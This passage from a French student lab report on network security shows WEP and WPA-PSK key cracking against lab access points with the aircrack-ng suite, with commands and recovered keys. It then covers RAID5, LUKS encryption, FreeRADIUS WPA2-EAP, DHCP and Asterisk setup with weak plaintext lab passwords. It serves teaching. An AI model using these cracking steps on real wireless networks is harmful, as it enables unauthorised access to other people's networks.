root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 qui représente le RAID5 de partitions&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mkfs /dev/md0&lt;br /&gt;
mkdir /datamd0&lt;br /&gt;
mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon oct 13 11:45:01 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour rajouter la partition, on la decommente dans le fichier de configuration et on procede au rajout de cette partition au raid de la facon suivante:&lt;br /&gt;
&lt;br /&gt;
 mdadm --add /dev/md0 /dev/xvde&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DCHP ====&lt;br /&gt;
&lt;br /&gt;
Pour cette partie, nous avons d'abord installer le paquet isc-dhcp-server.&lt;br /&gt;
Ensuite, nous avons modifier le fichier dhcpd.conf :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
option domain-name &amp;quot;jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.162;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.3.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.3.10 10.60.3.40;&lt;br /&gt;
      option routers 10.60.3.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite isc-dhcp-server pour rajouter l'interface wlan0 : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
INTERFACES=&amp;quot;wlan0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant nous connecter sur le reseau Wifi via smartphone, le serveur DHCP fonctionne correctement.&lt;br /&gt;
[[Fichier:Connexioniphone.JPG|thumb|center|Connexion via smartphone]]&lt;br /&gt;
&lt;br /&gt;
==== Configuration et utilisation du PCBX ====&lt;br /&gt;
&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=JulienJoignaux&lt;br /&gt;
username=jjoignaux&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&lt;br /&gt;
&lt;br /&gt;
[6002]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=LoicDelecroix&lt;br /&gt;
username=ldelecro&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions le fichier extensions.conf&lt;br /&gt;
